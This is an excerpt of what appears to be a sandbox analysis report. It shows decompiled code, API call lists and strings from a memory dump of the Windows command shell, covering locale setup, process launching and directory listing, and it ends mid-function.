GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,001DF81C,00000008,00000000,?), ref: 001C3FA8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 001C3FC5
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 001C402A
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 001C406C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,001DF80C,00000008), ref: 001C4094
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,001DF7A8,00000020), ref: 001C40AC
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,001DF768,00000020), ref: 001C40C4
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,001DF728,00000020), ref: 001C40DC
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,001DF6E8,00000020), ref: 001C40F4
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,001DF6A8,00000020), ref: 001C410C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,001DF668,00000020), ref: 001C4124
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,001DF628,00000020), ref: 001C413C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,001DF7FC,00000008), ref: 001C4154
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,001DF7E8,00000008), ref: 001C416C
setlocale.MSVCRT ref: 001C4181

Strings

Mon, xrefs: 001CE2C3
MM/dd/yy, xrefs: 001C4049
dd/MM/yy, xrefs: 001CE26D
1, xrefs: 001C4076
Wed, xrefs: 001CE347
yy/MM/dd, xrefs: 001CE254
Fri, xrefs: 001CE3CB
Tue, xrefs: 001CE305
.OCP, xrefs: 001C417A
Thu, xrefs: 001CE389
Sun, xrefs: 001CE44F
Sat, xrefs: 001CE40D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: InfoLocale$DefaultUsersetlocale
String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 1351325837-478706884
Opcode ID: 34621d1c650efa3113fd0812571099aac8ab5412cdf455367dba7e334d7a9215
Instruction ID: df66ff6be0aae8c63560e6fc177007b3de1fb631a81876ea58017c563dd66019
Opcode Fuzzy Hash: 34621d1c650efa3113fd0812571099aac8ab5412cdf455367dba7e334d7a9215
Instruction Fuzzy Hash: 4FD1027564024296DB289F348D09FBA32E9FF71740F14816EEA12EBAD4EB70DA46C351

Uniqueness

Uniqueness Score: -1.00%

Function 001C374E Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322
threadprocessstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E001C374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E001C75CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x1dbdf8, 0x108);
				if(_t68 == 0) {
					 *0x1f3cf0 = GetLastError();
					E001D5011(_t135);
					L21:
					return E001C7614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0x1f3cf0 = GetLastError();
					E001D5011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E001C3320(L"COPYCMD") == 0) {
					}
					_t90 = E001BDF40(0x1b24ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x1dd0b4);
						L001C82BB();
						L36:
						goto L21;
					}
					if( *0x1f3ccc == 0) {
						__eflags =  *0x1f8058;
						if( *0x1f8058 != 0) {
							goto L6;
						}
						__eflags =  *0x1f3cc4;
						if( *0x1f3cc4 == 0) {
							L8:
							E001C4C00();
							_t94 =  *0x1f3cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0x1f3cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0x1f3ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0x1f3cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E001C3A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0x1f3cc9;
									if( *0x1f3cc9 == 0) {
										L48:
										__eflags =  *0x1f3cf0 - 0x2e4;
										if( *0x1f3cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E001C00B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E001C1040(_t177, 0x7fe7, _t135);
												E001D5011(_t177);
												E001C0040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E001C7797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
											_t163 =  *0x1f3cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0x1f3ab0;
											}
											_t174 =  *0x1fc01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x1f3cf0);
										}
										goto L54;
									}
									__eflags =  *0x1f3cf0 - 0xc1;
									if( *0x1f3cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0x1e3838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0x1dd54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E001C3A30();
											goto L21;
										}
										_t109 = E001C4C3E();
										 *0x1eb8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E001C274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E001C3A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E001C274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E001C3A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E001D579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0x1b24f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0x1f3ccc == 0) {
										__eflags =  *0x1f3cc4;
										if( *0x1f3cc4 != 0) {
											goto L16;
										}
										__eflags =  *0x1f3cc9;
										if( *0x1f3cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0x1f8058;
											if( *0x1f8058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E001D52E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0x1f3cb8;
							if(_t95 == 0) {
								_t95 = 0x1f3ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E001C2349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E001D4478();
					}
					goto L8;
				}
			}

0x001c3758
0x001c375d
0x001c3763
0x001c3769
0x001c376c
0x001c376f
0x001c3771
0x001c3777
0x001c377d
0x001c3783
0x001c3799
0x001c37a0
0x001c37a8
0x001cddec
0x001cddf3
0x001c39e2
0x001c39e7
0x001c39e7
0x001c37b1
0x001c37c8
0x001c37cf
0x001c37d7
0x001cde08
0x001cde0f
0x001cde1b
0x00000000
0x001c37dd
0x001c37e7
0x001c37f5
0x001c37fb
0x001c3808
0x001c380e
0x001c3817
0x001c381f
0x001c3820
0x001c3826
0x001c382c
0x001c3832
0x001c3840
0x001c3848
0x001c3853
0x001c385c
0x001c3862
0x001c3871
0x001c3873
0x001c387a
0x001c387f
0x001c3887
0x001cde3e
0x001cde3e
0x001cde43
0x001cde44
0x001cde49
0x001cde51
0x00000000
0x001cde53
0x001c3894
0x001cde59
0x001cde60
0x00000000
0x00000000
0x001cde66
0x001cde6d
0x001c38bc
0x001c38bc
0x001c38c1
0x001c38c8
0x001c39ea
0x001c39ed
0x001c39ef
0x00000000
0x00000000
0x001cde82
0x001cde87
0x001cde89
0x001cde8b
0x001cde8b
0x001cdeae
0x001c38fe
0x001c38fe
0x001c3902
0x001cdec3
0x001cdec9
0x001cdecf
0x001c3908
0x001c390e
0x001c391a
0x001c391a
0x001c3926
0x001c392b
0x001c3932
0x001cded9
0x001cdee0
0x001cdeee
0x001cdeee
0x001cdef8
0x001cdf3e
0x001cdf3e
0x001cdf40
0x00000000
0x00000000
0x001cdf50
0x001cdf52
0x001cdf54
0x001cde2b
0x001cde32
0x001cde39
0x001cde39
0x00000000
0x001cdf54
0x001cdefa
0x001cdefa
0x001cdeff
0x001cdf01
0x001cdf3c
0x001cdf03
0x001cdf03
0x001cdf09
0x001cdf0b
0x001cdf0d
0x001cdf0d
0x001cdf38
0x001cdf38
0x00000000
0x001cdf01
0x001cdee2
0x001cdeec
0x00000000
0x00000000
0x00000000
0x001c3938
0x001c3938
0x001c3938
0x001c3943
0x001c3949
0x001c394a
0x001c394e
0x001cdf98
0x001cdf9a
0x001c3967
0x001c3967
0x001c3970
0x001c3977
0x001c3a0c
0x001c3a0c
0x001c3a0f
0x001cdfbc
0x001cdfc2
0x001cdfc4
0x001cdfcb
0x001cdfd1
0x001cdfd1
0x001c3a15
0x001c3a15
0x001c3a17
0x001c3a1f
0x001c3a1f
0x001c3a17
0x001c39d4
0x001c39d4
0x001c39db
0x00000000
0x001c39e0
0x001c3983
0x001c3988
0x001c398d
0x001c3993
0x001c3995
0x001c39a7
0x001c39b7
0x001c39bf
0x001c3a26
0x001c3a29
0x00000000
0x00000000
0x001cdfac
0x001cdfb4
0x001c39c6
0x001c39cb
0x001c39d2
0x001c3a49
0x001c3a49
0x00000000
0x001c39d2
0x001c39c1
0x001c39c1
0x00000000
0x001c39c1
0x001c3954
0x001c3961
0x001c39fa
0x001c3a01
0x00000000
0x00000000
0x001cdf5f
0x001cdf66
0x00000000
0x001cdf6c
0x001cdf6c
0x001cdf73
0x00000000
0x00000000
0x001cdf79
0x001cdf7b
0x00000000
0x00000000
0x001cdf81
0x001cdf83
0x00000000
0x00000000
0x001cdf87
0x001cdf8e
0x001cdf8f
0x001cdf92
0x00000000
0x00000000
0x00000000
0x001cdf92
0x00000000
0x001cdf66
0x00000000
0x001c3961
0x001c3932
0x001c38ce
0x001c38ce
0x001c38d5
0x001cdeb9
0x001cdeb9
0x001c38f8
0x00000000
0x001c38f8
0x001cde73
0x001c389a
0x001c389c
0x001c389f
0x001c38a6
0x001cde78
0x001cde78
0x00000000
0x001c38a6

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,001DBDF8,00000108,001BC897,?,00000000,00000000,00000000), ref: 001C37A0
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 001C37CF
memset.MSVCRT ref: 001C37E7
memset.MSVCRT ref: 001C3840
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 001C3853

Part of subcall function 001C3320: _wcsnicmp.MSVCRT ref: 001C33A4

lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 001C38AE
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 001C38F8
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001C391A
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 001CDDE6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 001CDE02
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 001CDE1B
CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 001CDEAE
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001CDFCB

Strings

D, xrefs: 001C3848
%08X, xrefs: 001C399C
=ExitCode, xrefs: 001C39B2
, xrefs: 001C3783
\XCOPY.EXE, xrefs: 001C38A8
%01C, xrefs: 001CDFA1
H, xrefs: 001C37FB
COPYCMD, xrefs: 001C3865, 001C3926
=ExitCodeAscii, xrefs: 001C39C6

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
API String ID: 1603632292-3461277227
Opcode ID: 6abad2e8a1c7e2666c50c3185cd21595a37e01d256fdafd64c834242f467d82e
Instruction ID: 187b001d260c76807b9d220edafe4ce9a1692690e214bfcfbc87bf15dde95844
Opcode Fuzzy Hash: 6abad2e8a1c7e2666c50c3185cd21595a37e01d256fdafd64c834242f467d82e
Instruction Fuzzy Hash: 06C18071A003199BDB24DB64DC49FBA77B8AB65704F0080AEF55AE7290DB70CE85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001C6550 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E001C6550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E001C8290(0x44d4);
				_t187 =  *0x1dd0b4; // 0xea614d48
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E001C65F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
						return E001C6FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E001DA49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E001D7A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E001DA3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E001BB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E001DA2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E001C7797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E001C0C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E001C51C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0x1fc00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E001D9FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E001BB610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0x1fc038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E001BB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0x1dd190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0x1dd190; // 0x13
								_t364 = _t399;
								E001D7A11(_t364, _t389 + 0x13);
								_push(_t364);
								E001C6740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0x1dd190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E001D7A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E001C6740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E001C0C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E001C6B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E001C51C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E001C6B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E001C00B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E001C6B76(_t399, L"%s", _v4);
													E001C0040(_v8);
												}
												_t372 = L"%s";
												E001C6B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E001C6B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E001C0C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E001C00B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
